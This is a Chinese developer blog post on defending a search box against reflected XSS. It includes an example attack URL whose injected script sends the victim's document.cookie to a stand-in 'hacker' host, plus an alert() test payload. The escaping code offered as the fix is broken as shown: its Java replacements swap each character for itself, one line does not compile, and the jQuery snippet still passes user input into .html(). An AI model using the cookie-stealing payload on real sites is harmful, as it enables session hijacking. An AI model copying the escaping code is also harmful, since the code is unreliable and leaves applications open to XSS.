搜索框反射型xss问题解决（网站开发）

什么是反射型XSS
      XSS又叫CSS (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的，比如获取用户的cookie，导航到恶意网站，携带木马等等。利用该漏洞，攻击者可以劫持已通过验证的用户的会话。劫持到已验证的会话后，攻击发起者拥有该授权用户的所有权限。

反射型XSS漏洞的攻击步骤

（1） 用户正常登录Web应用程序，登录成功会得到一个会话信息的cookie： 
例：Set-cookie:sessId = f16e1035c301aa099c971682d806c0c7 f16e1035c301aa099c971682d806c0c7

（2） 攻击者将含有攻击代码的URL发送给被攻击人，例：http://fovweb.com/xss/message.php?send=%3Cscript%3Edocument.write(‘%3Cimg%20height=0%20width=0%20src=%22 http://hacker.fovweb.com/xss/cookie_save.php%3Fcookie=%3D’%20+%20encodeURL(document.cookie)%20+%20’%22/%3E’)%3C/script%3E

举例子：比如网站一般都有的搜索框，当在输入框里面输入：<script>alert(xx.cookies)</script> 的时候，如果你没有处理xss，那么就会弹出提示框，攻击者可以获取cookie信息，从而达到获取用户的所有权限

一般解决办法：

反射型XSS漏洞处理

了解了一下一般反射型XSS漏洞的处理：

（1） 对一些特殊的标签进行转义； 
（2） 直接过滤掉JavaScript事件标签和一些特殊的html标签； 
（3） 将重要的cookie标记为http only； 
（4） 只允许用户输入我们期望的数据； 
（5） 对数据进行html encode处理等。

我的实际解决方案：

第一，我在后端（java）对要输出到前端的信息，进行特殊字符转换，这样的话jsp页面里就识别不出来为js代码

public static String revertString(String input) {
        // 使失去用处的标签从新有作用
        if (input == null) {
            input = "";
            return input;
        }
        input = input.trim().replaceAll("&", "&");
        input = input.trim().replaceAll("<", "<");
        input = input.trim().replaceAll(">", ">");
        input = input.trim().replaceAll("\t", "    ");
        input = input.trim().replaceAll("\r\n", "\n");
        input = input.trim().replaceAll("\n", "<br>");
        input = input.trim().replaceAll("\"", """);
        input = input.trim().replaceAll("'", "'");
        input = input.trim().replaceAll("\\\\", "\");
        return input;
}

第二，如果你在前端进行赋值的话，也要进行转换

var content = $("#so").val().replace(/&/g, '&').toString().replace(/</g, '<').replace(/>/g, '>');

$('#ssjg_div').html(content );　

如此就可以解决：搜索框里输入以下所遇到的问题了：

1，<script>alert(xx.cookies)</script>

2，"aa"

3，$nbsp